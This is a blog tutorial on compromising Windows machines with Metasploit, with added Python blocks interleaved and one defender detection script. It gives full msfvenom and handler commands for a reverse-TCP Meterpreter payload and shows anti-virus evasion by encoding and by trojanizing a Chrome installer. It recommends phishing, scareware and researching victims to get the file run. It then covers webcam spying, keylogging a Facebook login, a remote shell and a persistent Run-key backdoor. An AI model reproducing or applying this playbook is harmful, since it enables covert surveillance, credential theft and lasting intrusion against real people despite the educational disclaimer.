Spy On Windows Machines Using Metasploit

Jamie Pegg
15 min read · Jun 21, 2019
Metasploit banner

Note you can now read this article on my new blog at https://blog.jamiepegg.com/metasploit-tutorial

Before We Start

Disclaimer (MUST READ)

The contents of this tutorial are for educational purposes only. I strongly advise against, and am not responsible for, any misuse of the information given. The tutorial has been made using my own hardware and does not contain any illegal activity.

Before we start, I would just like to cover a few basic pieces of information we will need, including keywords and names.

What is Metasploit?

First of all, Metasploit, maintained by Rapid7, is an open-source framework for developing, testing and running exploits and payloads. Penetration testers use it to verify vulnerabilities and demonstrate impact; defenders use the same modules to check whether their detections actually fire.

The latest version, 5.0.19 at the time of writing, ships with 1897 exploit modules and 547 payloads (the numbers the msfconsole banner prints), which can be used to gain remote access to machines and servers.

What is a meterpreter?

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more. On Windows it lives entirely inside the process that loaded it, so by default nothing is written to disk; that is what makes it harder to spot than a dropped executable, and why the persistence step at the end of this tutorial is the noisy part.
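To make the word "stager" concrete, here is an added Python model (not from the original article and not Metasploit's code) of the staged reverse_tcp handshake that the rest of the tutorial relies on: the tiny stager inside the .exe connects back to LHOST:LPORT, the handler answers with a length prefix followed by the Meterpreter stage, and the stager reads exactly that many bytes before jumping into them. The 4-byte little-endian length framing is my reading of the Windows reverse_tcp stager and is an assumption; the stage bytes are a constructed placeholder.

```python
import socket
import struct
import threading

# Constructed stand-in for the stage. A real handler sends the Meterpreter
# DLL (hundreds of KB); a few marker bytes are enough to exercise the framing.
STAGE = b"\x90" * 16 + b"METERPRETER-STAGE-PLACEHOLDER"


def handler_serve_once(listener: socket.socket, stage: bytes) -> None:
    """Accept one connect-back and push the stage, framed as the stager expects.

    Framing (my reading of the Windows reverse_tcp stager, an assumption):
    a 4-byte little-endian length followed by exactly that many stage bytes.
    """
    conn, _peer = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP may deliver the stage in many segments."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError("handler closed the socket before the stage was complete")
        buf.extend(chunk)
    return bytes(buf)


def stager_connect_back(lhost: str, lport: int, max_stage: int = 64 * 1024 * 1024) -> bytes:
    """What the stager inside the .exe does: connect to LHOST:LPORT, read the
    length prefix, then read the stage. A real stager would VirtualAlloc a
    buffer of that size and jump into it; here we just return the bytes."""
    with socket.create_connection((lhost, lport), timeout=5) as sock:
        (length,) = struct.unpack("<I", recv_exact(sock, 4))
        if length == 0 or length > max_stage:
            # A handler configured with a different payload (or a non-Metasploit
            # listener) sends something else here; this is where staging breaks.
            raise ValueError(f"implausible stage length {length}")
        return recv_exact(sock, length)


def demo(stage: bytes = STAGE) -> bytes:
    """Run handler and stager on localhost and return what the stager received."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free LPORT
    listener.listen(1)
    lhost, lport = listener.getsockname()
    handler = threading.Thread(target=handler_serve_once, args=(listener, stage))
    handler.start()
    try:
        return stager_connect_back(lhost, lport)
    finally:
        handler.join()
        listener.close()


if __name__ == "__main__":
    received = demo()
    print(f"stager received {len(received)} bytes, identical to stage: {received == STAGE}")
```

The point for the later chapters: the handler must be configured with the same staged payload as the executable, because the stager trusts whatever arrives on that socket to be the stage. A stageless payload (windows/meterpreter_reverse_tcp, with an underscore) carries the whole Meterpreter in the file and skips this exchange.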

Introduction

For this tutorial, I'll be using my 2017 27-inch 5K iMac, running Kali Linux 2019.2 in a VM, as the attacking host, and my old laptop, running Windows 8, as the target. You can use any machine with Metasploit installed as the host; the target in this tutorial will specifically be a Windows machine.

Plan of attack

Like I mentioned above, this tutorial specifically targets Windows machines. To do this we will use Metasploit's windows/meterpreter/reverse_tcp payload. "Reverse" means the target connects out to our listener rather than the other way round, so it works through NAT and most firewalls that allow outbound traffic, as long as the target can reach our LHOST:LPORT.

I will be covering:

  • Configuring Metasploit
  • Generating Payloads
  • Evading Anti-Virus, Encoding Payloads And Using Templates
  • Delivering The Payload
  • Opening A Meterpreter Session And Meterpreter Commands
  • Installing Persistence And Opening A Backdoor

Configuring Metasploit

Feel free to skip this chapter if you have previously used Metasploit and have it all set up.

Download Metasploit

As I am using Kali Linux, Metasploit is already installed. If you are not on Kali Linux, you can install Metasploit from Rapid7's GitHub repository (https://github.com/rapid7/metasploit-framework) or the nightly installers linked from there.

Setting up Metasploit

Once you have installed Metasploit, or if it is your first time running it, we need to set up the Metasploit database. First open a terminal and make sure Metasploit is at the newest version. On Kali (which logged in as root at the time; on newer releases prefix the commands with sudo) type:

apt update; apt install metasploit-framework

If you installed from Rapid7's Git checkout or installer rather than a distribution package, use instead:

msfupdate

This will check for and download any necessary updates. Once our Metasploit is up-to-date we need to create the database itself, so simply enter the command:

msfdb init

You may be prompted to create a password, don’t worry if you are not, as long as the database is successfully initialised you’re good to go.

Output of ‘msfdb init’

Finally, to check that we have initialised the database correctly, start the Metasploit console by typing the following into your terminal:

msfconsole

Once we have launched the Metasploit console you can enter this command to check if our database is connected:

> db_status

If you were successful you should see something similar to this:

Successful output of ‘db_status’

Yours probably won't look exactly the same; just make sure it says 'connected' somewhere. Without the database, search is much slower and session/host bookkeeping is lost.

Generating Payloads

We first need to build a payload to deliver to the victim in order to gain access to their machine.

Searching for payloads

To find the correct payload for our attack we can search Metasploit's 1897 exploits and 547 payloads using the search command. To see the parameters the search command takes, simply enter (in the Metasploit console):

> search
Output of ‘search’ in the Metasploit console

Here we can see the keywords we can use to filter modules (e.g. type:, platform:, name:, cve:). In our case we are attacking a Windows machine, so we can use the platform keyword. Note there is no space after the colon:

> search platform:windows

As you can see, the above command outputs well over a thousand modules of every type (exploits, auxiliary, post and payloads). Even if we narrow the search to payloads only using:

> search type:payload platform:windows

we still get far too many results (show payloads lists them all too). So when you are choosing your payload, take your time to pick one that is known to work. Here are two favourite Windows payloads you may want to use:

  • windows/meterpreter/reverse_tcp
  • windows/vncinject/reverse_tcp

For this tutorial we are going to use windows/meterpreter/reverse_tcp. The slash between meterpreter and reverse_tcp marks it as a staged payload: the small stager in the .exe only connects back and downloads the full Meterpreter from our handler (the stageless equivalent, with the whole payload in the file, is windows/meterpreter_reverse_tcp). Feel free to use windows/vncinject/reverse_tcp instead, which is similar but opens a VNC session, useful for viewing the target's desktop.

Msfvenom // creating the payload

Once you have found your desired payload, we must turn it into an executable the victim can run on the target machine to start the Meterpreter session. For this we use msfvenom, Metasploit's standalone payload generator and encoder (it replaced the older msfpayload and msfencode tools).

The command we can type to view more information on msfvenom is:

msfvenom

You should get something like this:

Output of ‘msfvenom’

Here we can see all the options msfvenom accepts. I'm not going to go through them all as most are self-explanatory. The ones we are going to use are:

  • --payload / -p (name of the chosen payload).
  • --format / -f (format of the output, e.g. exe, dll or raw shellcode; list them with msfvenom --list formats).
  • --arch / -a (architecture of the target: x86 for 32-bit or x64 for 64-bit Windows; a 32-bit payload also runs on 64-bit Windows, the reverse does not).
  • Payload options passed as NAME=value, such as LHOST and LPORT.

Before you can create the payload, you need to know the listen host (LHOST) and listen port (LPORT) the payload will connect back to. If the target is on the same network as the host, you can simply find your local IPv4 address with:

ifconfig

However, if you wish to attack a machine on a different network, LHOST must be an address the target can reach, which means port forwarding on your router or running the listener on a public host. I will not be covering this here as it is a whole other topic.

For the port, choose the port the handler will listen on; the payload connects out to it, so the target must be allowed to make outbound connections to that port. Today I am using port 4444.

Once you have decided which parameters you will use/need you can create a payload. For example here is the command I used:

msfvenom --payload windows/meterpreter/reverse_tcp --arch x86 --format exe LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe
A successfully generated payload

Once you have generated the payload, the output file will be in the current directory (the directory you were in when the command was executed), unless you redirected it elsewhere or used --out / -o with a path.

Evading Anti-Virus, Encoding Payloads And Using Templates

Although we have successfully generated our payload, there is one problem with the file: it is trivially detected by anti-virus, because msfvenom's default output and the Meterpreter stager are among the most heavily signatured artefacts there are. In a real-life scenario the file may be quarantined the moment it lands on disk, or the victim may hesitate to run it.

Evading anti-virus

This whole chapter is about making our payload less obvious to anti-virus. There are many ways to do this, but I will discuss the four main ones:

  • Encoding payloads
  • Templates (trojan)
  • External tools
  • Other techniques

Please note before you read on, the above methods will more than likely not work on their own, and encoding in particular does little against modern anti-virus. It is best to use a combination of techniques and to test the result against the same anti-virus product the target runs, on a machine you control.

Encoding payloads

To encode our payload with Metasploit we add two extra parameters to our msfvenom command. The first is the encoder (--encoder / -e). We can list the available encoders with:

msfvenom --list encoders
List of encoders currently available from Metasploit

As you can see there are many encoders available. The output (as seen above) shows the name, rank and description of each. The one we will use, and one of the most popular, is x86/shikata_ga_nai, a polymorphic XOR additive-feedback encoder. Be aware that its 'excellent' rank reflects how reliably it avoids bad characters in exploit buffers, which is what encoders were designed for; it says nothing about anti-virus evasion, and the shikata_ga_nai decoder stub is itself a well-known signature.

The second parameter is the number of iterations (--iterations / -i): how many times the payload is passed through the encoder. Each pass wraps the previous output, decoder stub included, in another decoder stub, so keep the number small. Hundreds of iterations only bloat the payload, slow down decoding and can make encoding fail outright.

Once you have chosen your encoder and number of iterations your msfvenom command should look something like the following:

msfvenom --payload windows/meterpreter/reverse_tcp --arch x86 --format exe --encoder x86/shikata_ga_nai --iterations 5 LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe

If you execute the command, the finished payload is written to the current directory as before.
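To show what an encoder actually does, and why its rank is not an anti-virus rating, here is an added Python model (not Metasploit's code and not from the original article) of an XOR additive-feedback encoder with iterations. The decoder stub is a constructed marker string standing in for the real x86 stub, and the key-update rule is a simplified reading of shikata_ga_nai's, so treat the details as assumptions. The lessons carry over regardless: the key ships inside the file, every run produces different bytes, and the outermost decoder stub is always in the clear no matter how many iterations you add.

```python
import os
import struct

# Constructed stand-in for the decoder stub. The real x86/shikata_ga_nai stub
# is a short x86 loop (load key, XOR each dword, add the decoded dword to the
# key); its bytes vary slightly but its structure is recognisable.
DECODER_STUB = b"<stub-model>"   # 12 bytes, so stub + key stays dword-aligned
KEY_LEN = 4


def _pad4(data: bytes) -> bytes:
    """Pad with NOPs so the buffer can be processed as 32-bit words."""
    return data + b"\x90" * (-len(data) % 4)


def xor_feedback_encode(data: bytes, key: int) -> bytes:
    """XOR each dword with a rolling key, then add the decoded dword to the key.

    Simplified model of an XOR additive-feedback encoder, not Metasploit's
    implementation. The feedback means one changed byte alters every later
    word, but the transform is fully reversible given the key.
    """
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", _pad4(data)):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & 0xFFFFFFFF
    return bytes(out)


def xor_feedback_decode(blob: bytes, key: int) -> bytes:
    """The decoder stub's job: undo the XOR, tracking the key the same way."""
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", blob):
        word = enc ^ key
        out += struct.pack("<I", word)
        key = (key + word) & 0xFFFFFFFF
    return bytes(out)


def encode_iterations(payload: bytes, iterations: int, rng=os.urandom) -> bytes:
    """Model of --iterations N: each pass wraps the previous output, stub and
    all, under a fresh random key and another stub. The key ships in the file."""
    blob = _pad4(payload)
    for _ in range(iterations):
        (key,) = struct.unpack("<I", rng(KEY_LEN))
        blob = DECODER_STUB + struct.pack("<I", key) + xor_feedback_encode(blob, key)
    return blob


def decode_iterations(blob: bytes, iterations: int) -> bytes:
    """What runs on the target: peel the layers using only what is in the file."""
    for _ in range(iterations):
        if not blob.startswith(DECODER_STUB):
            raise ValueError("outer layer is not a decoder stub")
        key_at = len(DECODER_STUB)
        (key,) = struct.unpack("<I", blob[key_at:key_at + KEY_LEN])
        blob = xor_feedback_decode(blob[key_at + KEY_LEN:], key)
    return blob


def visible_stubs(blob: bytes) -> int:
    """Decoder stubs a scanner can see without running the file. Inner stubs
    are hidden by the outer layer, but the outermost one is always exposed."""
    return blob.count(DECODER_STUB)


if __name__ == "__main__":
    shellcode = b"\x31\xc0\x50\x68\x63\x61\x6c\x63"   # constructed 8-byte sample
    a = encode_iterations(shellcode, 5)
    b = encode_iterations(shellcode, 5)
    print("differs per run:", a != b, "| visible stubs:", visible_stubs(a),
          "| size:", len(a), "| round-trips:", decode_iterations(a, 5) == shellcode)
```

Run it a few times: the encoded bytes change every run (so hash-based detection of the file body fails), the size grows by one stub and key per iteration, and visible_stubs stays at 1 however many iterations you choose. That exposed outer stub is what signature engines match on, which is why the encoder alone rarely gets a stock Meterpreter past anti-virus.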

Templates

In msfvenom we can use a template to make our payload look like a regular program, or even embed it inside a working copy of that program. Doing so greatly increases the chance of the victim running the file. Which would you trust more, 'V1rU5.exe' or 'ChromeUpdate.exe'?

First we need a normal program to use as the template. This is probably the easiest part of this tutorial: simply head over to Google Chrome's website and download the installer for the target's platform. You don't have to use the Chrome installer, but the template must be a Windows executable (PE) of the same architecture as --arch; msfvenom cannot use an image or a music file as a template. Bear in mind that a downloaded installer is usually Authenticode-signed and injecting into it breaks the signature, which security products treat as suspicious in its own right.

Now you have your template, simply add the following to your msfvenom command (the short form is -x):

--template /home/Downloads/ChromeUpdate.exe

Obviously, replace the path with the path to your template. If you also add --keep (-k), msfvenom preserves the template's original behaviour and runs the payload in a new thread, so the installer still appears to work; without it the file only borrows the template's icon and metadata. Here is what our overall command looks like:

msfvenom --payload windows/meterpreter/reverse_tcp --template /home/Downloads/ChromeUpdate.exe --arch x86 --format exe --encoder x86/shikata_ga_nai --iterations 5 LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe

External tools

I'm not going to cover any specifics in depth as this tutorial is already becoming very long and these tools have hundreds of settings for evading anti-virus.

External tools can be used once you have generated your payload to wrap, encrypt or obfuscate it further and hopefully sneak it past anti-virus. Some good examples of external tools are:

These are just a few of many tools you can use. They all work similarly: take in your msfvenom payload (usually as raw shellcode, generated with --format raw), transform it, and output a new file.

Other techniques

Some other techniques that are worth pointing out are basic things:

  • Don't use stupid names → Please don't use stupid names for your payload because, trust me, no one is ever going to run a file named 'SuP3r5ecRetV1RuS.exe'. Use something sensible and believable such as 'BiologyHomework.pptx' or 'PhotoshopHairBrush.abr'.
  • Use appropriate file extensions → I've seen this happen many times too, and it is honestly one of the biggest giveaways that something is wrong with your file. Use the correct extension: if your payload is inside a Word document, make sure the extension is .docx, not .rar or something dodgy.
  • Do a background check on your victim → Before you attack your victim do some research on them; this will greatly increase the chance of them opening the file. A common example is age: if your victim is a student, try sending them some revision materials.
  • Use sensible ports → For this tutorial I'm using port 4444, which is a bad example as it is well known as Metasploit's default. The connection is outbound from the target, so pick a port its firewall or proxy already lets out, such as 443 or 80.

Delivering The Payload

The hardest part :(

Getting the payload on the victim’s machine

This is definitely the trickiest part of this tutorial: we now have to get our 'secret, encoded, in-disguise' payload file, or whatever you want to call it, onto the victim's machine. This would need a whole other tutorial as it is such a big topic. Some methods you could try are:

  • Via email → A phishing email asking the user to download a file is a very common and successful way of getting a payload onto a victim's machine.
  • Scareware → You could try using scareware to get the victim to download your file. For example, the classic: "A virus has been detected, update Adobe Flash Player now!".
  • Physical access → You could simply plug a USB stick with the payload into the victim's machine and execute the file. The only problem is you need physical access.

Opening A Meterpreter Session And Meterpreter Commands

Let the games begin…

Configuring the handler

If you have successfully got your payload onto the victim's machine, you're probably wondering what to do next. First we must configure Metasploit to listen for our Meterpreter in order to open a session. Start the Metasploit console with:

msfconsole

Once the Metasploit console has loaded we must load the generic payload handler, exploit/multi/handler, so simply type:

> use multi/handler

If that was successful you should see the following:

Metasploit console using multi/handler

Once you have loaded the multi/handler module, we must tell Metasploit which payload our malicious file was built with. The handler must use exactly the same payload: for a staged payload like this one, the stager in the .exe expects this handler to send it the Meterpreter stage, and a mismatched handler will never produce a session. To set the payload, use the command:

> set payload windows/meterpreter/reverse_tcp

Now we must set LHOST and LPORT for the handler to listen on. Use the same port as in msfvenom, and an address that belongs to this machine (the LHOST you put in the payload, or 0.0.0.0 to listen on all interfaces).

To set the LHOST use the command:

> set LHOST 192.168.0.28

To set the LPORT use the following:

> set LPORT 4444

Obviously, change the above to use your IP and Port. Here is a screenshot of what my Metasploit console looked like, just so you can check you have done it right:

Overall Metasploit console after configuration

You can actually preview the changes we have set using the command:

> show options

This should output something like this, don’t worry if yours isn’t exactly the same, just ensure you have set the correct payload, IP and port:

Output of ‘show options’

Listening for the session

Now we have configured Metasploit we need to tell it to listen for the payload in order to open the session. This section is very short as we simply have to use the command:

> exploit

(exploit -j runs the handler as a background job so the console stays usable, and set ExitOnSession false keeps it listening after the first session connects; both are worth setting before the persistence chapter.)

Please note, if you get the following error:

Bad port error

it means the port you have chosen is already in use on this machine (ss -ltnp will show you by what), so either free it or go back and rebuild the payload with a different port. Please don't worry if you get an error saying handler failed to bind to: <address>:<port>, as long as it is followed by:

Metasploit successfully listening

This means Metasploit is listening for the meterpreter session to start.
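Because the payload and the handler are configured in two places, the classic failure is a mismatch: a different port, a different payload, or a port something else already holds. The following Python helper is an added example, not part of the article or of Metasploit. It builds the msfvenom command line and a matching multi/handler resource script from one set of values, validates LHOST and LPORT, and tests whether the port can actually be bound on this host, which is the check behind the 'bad port' error above. The function names and the resource-script layout are mine; the msfvenom flags and handler options it emits are the real ones.

```python
import errno
import ipaddress
import shlex
import socket


def validate_endpoint(lhost: str, lport: int) -> None:
    """Reject values the payload would silently fail with (bad IP, port out of range)."""
    ipaddress.IPv4Address(lhost)            # raises ValueError for e.g. 192.168.0.999
    if not 1 <= int(lport) <= 65535:
        raise ValueError(f"LPORT {lport} is not a valid TCP port")


def rejects_bad_endpoint(lhost: str, lport: int) -> bool:
    """True if validate_endpoint refuses the pair (handy for a quick self-check)."""
    try:
        validate_endpoint(lhost, lport)
    except ValueError:
        return True
    return False


def port_is_free(host: str, port: int) -> bool:
    """Bind host:port the way multi/handler will. False means something already
    listens there, which is what the 'bad port' error is telling you."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((host, port))
            return True
        except OSError as e:
            if e.errno == errno.EADDRINUSE:
                return False
            if e.errno == errno.EADDRNOTAVAIL:
                raise ValueError(f"{host} is not an address of this machine; LHOST must be local")
            raise


def msfvenom_argv(payload, lhost, lport, out, arch="x86", encoder=None, iterations=1, template=None):
    """msfvenom command line using the same LHOST/LPORT the handler will get."""
    validate_endpoint(lhost, lport)
    argv = ["msfvenom", "-p", payload, "-a", arch, "-f", "exe",
            f"LHOST={lhost}", f"LPORT={lport}", "-o", out]
    if encoder:
        argv += ["-e", encoder, "-i", str(iterations)]
    if template:
        argv += ["-x", template]
    return argv


def handler_rc(payload, lhost, lport, listen_host=None):
    """A msfconsole resource script for the matching multi/handler.

    listen_host defaults to lhost; 0.0.0.0 listens on every interface.
    ExitOnSession false keeps the handler up for persistence reconnects and
    -j runs it as a background job so the console stays usable.
    """
    validate_endpoint(lhost, lport)
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {listen_host or lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


def plan(payload, lhost, lport, out="windowsMeterpreter.exe", **venom_opts):
    """Bundle both sides so their values cannot drift apart."""
    return {
        "msfvenom": shlex.join(msfvenom_argv(payload, lhost, lport, out, **venom_opts)),
        "handler_rc": handler_rc(payload, lhost, lport),
    }


def port_conflict_demo() -> bool:
    """Occupy a random loopback port and report what port_is_free says about it."""
    holder = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    holder.bind(("127.0.0.1", 0))
    holder.listen(1)
    port = holder.getsockname()[1]
    try:
        return port_is_free("127.0.0.1", port)   # False: the handler could not bind here
    finally:
        holder.close()


if __name__ == "__main__":
    p = plan("windows/meterpreter/reverse_tcp", "192.168.0.28", 4444,
             encoder="x86/shikata_ga_nai", iterations=5)
    print(p["msfvenom"])
    print(p["handler_rc"])        # save as handler.rc and run: msfconsole -q -r handler.rc
    try:
        print("port free on this host:", port_is_free("192.168.0.28", 4444))
    except ValueError as e:
        print(e)                  # the article's LHOST is not an address of this machine
```

Save the resource script as handler.rc and start it with msfconsole -q -r handler.rc; the LHOST/LPORT check runs before either tool does, so a port clash or a typo in the address shows up before you have handed a dead payload to anyone.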

Opening the session

Once we have set Metasploit to listen for our meterpreter session if our victim opens our file, this is what a successful connection should look like:

A successful meterpreter session

Meterpreter commands

Now we have a successful Meterpreter session on the victim, we are pretty much in control. To view all of the available Meterpreter commands, simply type:

> help
All available meterpreter commands

As you can see there are a lot of commands so I shall let you browse them all and explore. However, I would like to quickly talk you through some of my favorite ones:

  • webcam_snap / webcam_stream → This definitely makes it onto the list. By using:
> webcam_snap 

This takes a picture through the victim’s webcam, allowing you to spy on them.

Similar:

> webcam_stream

allows you to stream a victim’s webcam and watch what they’re doing live! Scary I know.

  • screenshot → Screenshot, well... takes a screenshot of the victim's monitor, which is extremely useful if you need to quickly see what the victim is doing. Here is an example:
> screenshot
Meterpreter command ‘screenshot’
  • keyscan_start / keyscan_dump → keyscan is essentially a keylogger, perfect if you are trying to capture the user's credentials for a specific site. It only sees keystrokes delivered to the desktop session of the process Meterpreter is running in, so if nothing shows up, migrate into a process in the user's interactive session (for example explorer.exe) first. First, type:
> keyscan_start

to start the key logger, and then once you know the victim is finished simply type:

> keyscan_dump

to dump the keystrokes. Finally, stop the key logger using:

> keyscan_stop

Here is an example of me logging into facebook:

Meterpreter keyscan on Facebook
  • Shell → shell is probably the most useful command of them all. Simply by entering:
> shell

into the Meterpreter session, you get a cmd.exe command prompt on the victim's machine. This is extremely useful as it lets you create, edit or delete files, copy files, view all the running processes and even shut down the computer. (Meterpreter's own upload, download, ps and kill commands do the same without spawning a visible cmd.exe process, which is quieter.)

Here is an example of a shell being created:

Shell being created

Installing Persistence And Opening A Backdoor

The final chapter!

Installing persistence/opening a backdoor

Now we have control of the victim's machine we can do whatever we want. However, if the victim's machine loses power or restarts, our session will close! This is not good at all, as to re-open the session they would have to run our file again. To solve this we need to install persistence.

Metasploit ships with a Meterpreter script that installs persistence by dropping a VBScript stager into the user's %TEMP% directory and registering it to start automatically. Recent versions warn that Meterpreter scripts are deprecated in favour of post modules (post/windows/manage/persistence_exe does the same job), but the script still works. To view the options the script takes, enter this in the Meterpreter session:

> run persistence -h

Here we see the following output:

Output of ‘run persistence -h’

As you can see most of the options are self-explanatory. The backdoor we are going to create will start when the user logs on and try to reconnect every 10 seconds until our handler answers. To do this we need the following command:

> run persistence -U -i 10 -p 4444 -r 192.168.0.37

Obviously, change the port and the IP. -U installs the autorun under the current user's HKCU Run key so it starts when that user logs on (-X uses the HKLM Run key and needs administrator rights; -S installs it as a service); -i is the interval in seconds between connection attempts; -p is the port; and -r is the IP of our host, which must be the address our handler listens on. Note that, unlike the initial session, this leaves a script file and a registry entry on the target, so remove them after the engagement (the script prints the path of a cleanup resource file it creates for exactly that).

We should get the following output:

Creating persistence
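From the defender's side, this is exactly the kind of persistence that is easy to spot: a Run-key value (HKCU for -U, HKLM for -X) whose data is a script file in the user's Temp directory, and a wscript.exe process running it. Here is an added Python check, not from the article and not from Metasploit, that scans the output of reg query and a list of process command lines for that pattern. The sample registry output and command lines are constructed; the value name and file name are invented, since the real script randomises them; the function names are mine.

```python
import re

# Constructed sample of what `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# prints on a machine where `run persistence -U` has dropped its VBScript.
# Names are random in the real script; "IvRrWfGz" is invented for this example.
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    IvRrWfGz    REG_SZ    C:\Users\alice\AppData\Local\Temp\IvRrWfGz.vbs
    Steam       REG_SZ    "C:\Program Files (x86)\Steam\steam.exe" -silent
"""

# Constructed process command lines (what a process listing would show).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\wscript.exe C:\Users\alice\AppData\Local\Temp\IvRrWfGz.vbs",
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]

TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)(?=$|\W)", re.I)
SCRIPT_HOST = re.compile(r"\b(?:wscript|cscript|mshta|powershell)\.exe\b", re.I)
# One value line of `reg query` output: name, type, data (indented under the key header).
REG_VALUE = re.compile(r"^\s+(\S+)\s+(REG_SZ|REG_EXPAND_SZ)\s+(.*?)\s*$")


def is_temp_script(text: str) -> bool:
    """True when text refers to a script file living in a Temp directory."""
    return bool(TEMP_DIR.search(text) and SCRIPT_EXT.search(text))


def suspicious_run_entries(reg_output: str):
    """Parse `reg query` output and return (value_name, data) for autoruns that
    point at a script in Temp, which is how persistence -U / -X installs itself.
    The key header line is ignored, so HKCU and HKLM output parse the same way."""
    hits = []
    for line in reg_output.splitlines():
        m = REG_VALUE.match(line)
        if m and is_temp_script(m.group(3)):
            hits.append((m.group(1), m.group(3)))
    return hits


def suspicious_cmdlines(cmdlines):
    """Flag script hosts (wscript, cscript, ...) executing a script from Temp:
    the same implant seen from the process side, kept alive by the -i retry loop."""
    return [c for c in cmdlines if SCRIPT_HOST.search(c) and is_temp_script(c)]


if __name__ == "__main__":
    for name, data in suspicious_run_entries(SAMPLE_RUN_KEY):
        print(f"autorun value {name!r} runs a script from Temp: {data}")
    for cmd in suspicious_cmdlines(SAMPLE_CMDLINES):
        print(f"script host running a Temp script: {cmd}")
```

On a live Windows host you would feed it the real output of reg query for both Run keys and the command lines from a process listing; legitimate software almost never autoruns a .vbs out of Temp, so every hit deserves a look, and the cleanup is the reverse of the install: delete the registry value and the script file.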

Rebooting the machine

Now we have successfully created a backdoor, we can test if it works by rebooting the victim’s machine. To do this, in our meterpreter simply enter:

> reboot

and this will reboot the victim’s machine. Then type:

> exit
Closing the meterpreter session

to close the session.

Reconnecting to the backdoor

For the next part, you need to ensure your Metasploit configuration is the same as previously, so in the Metasploit console enter:

> show options 

If your settings are not right, follow the instructions from earlier to change them back. If they are correct, listen for the session again with:

> exploit

in the Metasploit console. Now you just need to wait. The -U autorun only fires once the user logs back in, and the script then retries every 10 seconds (our -i value), so a new session should appear shortly after logon. For example:

New meterpreter session.

Closing Statement

Well there you have it, you have successfully spied on a windows machine using Metasploit and created a persistent backdoor.

Disclaimer (Again)

If you didn't read it at the start, please read it now: The contents of this tutorial are for educational purposes only. I strongly advise against, and am not responsible for, any misuse of the information given. The tutorial has been made using my own hardware and does not contain any illegal activity.

Final words

This is my first ever medium post, I hope it’s not too long, oops ahah. I will be continuing these tutorials in the future so make sure you follow my account. Also I would greatly appreciate it if you gave this post a clap if it’s any good. The support is greatly appreciated!

Thanks so much for reading this, I hope you have learned a lot, and I will see you all again soon! :)
